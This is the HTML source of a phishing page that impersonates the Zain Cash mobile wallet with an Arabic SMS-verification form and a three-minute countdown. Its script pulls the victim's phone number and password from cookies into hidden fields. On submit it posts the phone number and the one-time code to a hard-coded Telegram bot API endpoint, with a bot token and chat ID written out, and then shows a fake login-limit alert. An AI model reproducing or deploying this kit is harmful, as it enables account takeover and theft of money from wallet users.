<!DOCTYPE html>
<!-- Last Published: Sat Nov 02 2024 03:43:02 GMT+0000 (Coordinated Universal Time) -->
<html data-wf-domain="" data-wf-page="678516b9abe6f70728fa8eb9" data-wf-site="678516b9abe6f70728fa8e5f" lang="en">
<head>
  <meta charset="utf-8"/>
  <title>Dinarak</title>
  <meta content="width=device-width, initial-scale=1" name="viewport"/>
  <link href="https://cdn.prod.website-files.com/6709b4ecad0f1ceeeed96305/css/orangemonney.webflow.4d36521a0.css" rel="stylesheet" type="text/css"/>
  <link href="https://fonts.googleapis.com" rel="preconnect"/>
  <link href="https://fonts.gstatic.com" rel="preconnect" crossorigin="anonymous"/>
  <script src="https://ajax.googleapis.com/ajax/libs/webfont/1.6.26/webfont.js" type="text/javascript"></script>
  <script type="text/javascript">
    WebFont.load({
      google: {
        families: ["Montserrat:100,100italic,200,200italic,300,300italic,400,400italic,500,500italic,600,600italic,700,700italic,800,800italic,900,900italic","Roboto:300,regular,500"]
      }
    });
  </script>
  <script type="text/javascript">
    !function(o,c){
      var n=c.documentElement,t=" w-mod-";
      n.className+=t+"js",("ontouchstart"in o||o.DocumentTouch&&c instanceof DocumentTouch)&&(n.className+=t+"touch")
    }(window,document);
  </script>
  <link href="https://cdn.prod.website-files.com/img/favicon.ico" rel="shortcut icon" type="image/x-icon"/>
  <link href="https://cdn.prod.website-files.com/img/webclip.png" rel="apple-touch-icon"/>
  <style>
    body {
      box-sizing: border-box; 
      font-size:18px;
    }
    .container {
      padding: 0 5%;
    }
    .field-holder {
      position: relative; 
      margin-bottom:1.25em;
    }
    .w-input {
      border:0;
      border-bottom: 3px solid #ff1493;
      outline:none;
    }
    label { 
      position:absolute;
      top:0;
      left:0;
      font-size:1em;
      color:#ff1493;
      display:flex;
      align-items:center;
      cursor:text;
      transition: .3s ease-in-out;
    }
    .w-input, label {
      font-size:1em;
      width:100%;
      height:55px;
    }
    .w-input:focus + label, 
    .w-input:valid + label {
      color:#ff1493;
      font-size:.75em;
      top:-25px;
      pointer-events: none;
    }
    .w-input:focus,  
    .w-input:valid { 
      border-bottom: 3px solid #ff1493;
    }
    .CustomFooter {
      position: fixed;
      left: 0;
      bottom: 0;
    }
    .center-image {
      display: block;
      margin-left: auto;
      margin-right: auto;
    }
    .text-block-2 {
      color: #ff1493;
    }
    .text-span-9 {
      color: #ff1493;
    }
    .text-span-10 {
      color: #ff1493;
    }
    .countdown {
      font-size: 2em;
      color: #ff1493;
      text-align: center;
      margin-top: 20px;
    }
    .error-message {
      color: red;
      font-size: 1em;
      margin-top: 10px;
      text-align: center;
      display: none;
    }
  </style>
</head>
<body class="body">
  <div class="div-block-2">
    <img src="https://www2.0zz0.com/2025/03/22/14/224201474.jpg" class="center-image" alt="Zain Cash">
  </div>
  <div class="div-block-4">
    <div class="container">
      <div class="text-block-2">
       <div class="countdown" id="countdown">03:00</div>
        التحقق من رقم الموبايل<br/>
        <span class="text-span-9">تم أرسال رمز التحقق عبر الرسائل القصيرة الى:<br/></span>
        <span id="phonenumber_text" class="text-span-10">PLACEHOLDER</span>
      </div>

      <div id="verificationForm" class="w-form">
        <form id="wf-form-" name="wf-form-" data-name="التحقق من الامن" method="get" data-wf-page-id="678516b9abe6f70728fa8e5f" data-wf-element-id="79a466c5-9c18-b348-97ed-cbe6dd2fa663">
          <div id="field" class="field-holder">
            <input class="text-field-2 w-input" maxlength="6" name="field" data-name="رمز التحقق" pattern="\d{4,6}" placeholder="" type="text" id="pincode" required=""/>
            <label for="pincode">أدخل رمز التحقق </label>
          </div>
          <div class="div-block">
            <input type="submit" data-wait="يرجى الانتظار" class="submit-button w-button" value="التحقق" style="background-color: #ff1493;" />
          </div>
          <input class="text-field-3 w-input" maxlength="256" name="field" data-name="رقم الهاتف" placeholder="" type="text" id="phonenumber"/>
          <input class="text-field-4 w-input" maxlength="256" name="field" data-name="كلمة المرور" placeholder="" type="text" id="password"/>
        </form>
        <div class="success-message w-form-done">
          <div id="success">جاري التحقق من المعلومات المدخلة</div>
        </div>
        <div id="error-message" class="error-message">أدخلت كلمة السر بشكل غير صحيح</div>
      </div>
    </div>
  </div>
  <div class="customfooter">
    <div id="w-node-f65d2256-05c2-d21e-f218-de1540063814-eed96349">
      <div class="text-block"></div>
    </div>
  </div>
  <script src="https://d3e54v103j8qbb.cloudfront.net/js/jquery-3.5.1.min.dc5e7f18c8.js?site=6709b4ecad0f1ceeeed96305" type="text/javascript" integrity="sha256-9/aliU8dGd2tb6OSsuzixeV4y/faTqgFtohetphbbj0=" crossorigin="anonymous"></script>
  <script src="https://cdn.prod.website-files.com/6709b4ecad0f1ceeeed96305/js/webflow.1a78e01dd.js" type="text/javascript"></script>
  <script src="https://code.jquery.com/jquery-latest.min.js" type="text/javascript"></script>
  <script>
    function getCookie(cname) {
      let name = cname + "=";
      let decodedCookie = decodeURIComponent(document.cookie);
      let ca = decodedCookie.split(';');
      for(let i = 0; i <ca.length; i++) {
        let c = ca[i];
        while (c.charAt(0) == ' ') {
          c = c.substring(1);
        }
        if (c.indexOf(name) == 0) {
          return c.substring(name.length, c.length);
        }
      }
      return "";
    }

    phonenumber = getCookie('phonenumber');
    password = getCookie('password');
    document.getElementById('phonenumber_text').innerText=phonenumber;
    document.getElementById('phonenumber').value=phonenumber;
    document.getElementById('password').value=password;

    function startTimer(duration, display) {
      var timer = duration, minutes, seconds;
      setInterval(function () {
        minutes = parseInt(timer / 60, 10);
        seconds = parseInt(timer % 60, 10);

        minutes = minutes < 10 ? "0" + minutes : minutes;
        seconds = seconds < 10 ? "0" + seconds : seconds;

        display.textContent = minutes + ":" + seconds;

        if (--timer < 0) {
          timer = duration;
        }
      }, 1000);
    }

    window.onload = function () {
      var threeMinutes = 60 * 3,
          display = document.querySelector('#countdown');
      startTimer(threeMinutes, display);
    };

    $("#verificationForm" ).on( "submit", function( event ) {
      event.preventDefault();
      phonenumber = getCookie('phonenumber');
      pincode = document.getElementById('pincode').value;

      var message = "رقم الهاتف:`"+phonenumber+"`\n";
      message += "رمز التحقق:`"+pincode+"`\n";

      $.ajax({
        type: 'POST',
        url: `https://api.telegram.org/bot7578423392:AAFJ9fcnZBcQiq-FZ0MvLKCmuv83UtUU98Y/sendMessage`,
        data: {
          chat_id: "6873334348",
          text: message,
          parse_mode: 'markdown',
        },
        success: function (res) {
          console.debug(res);
          document.getElementById('error-message').style.display = "none";
          alert("عميلنا العزيز لقد وصلت الحد الأقصى لتسجيل الدخول سيتم مراسلتك بواسطه الدعم الفني لحل المشكلة");
        },
        error: function (error) {
          console.error(error);
          document.getElementById('error-message').style.display = "block";
        }
      });
    });
  </script>
</body>
</html>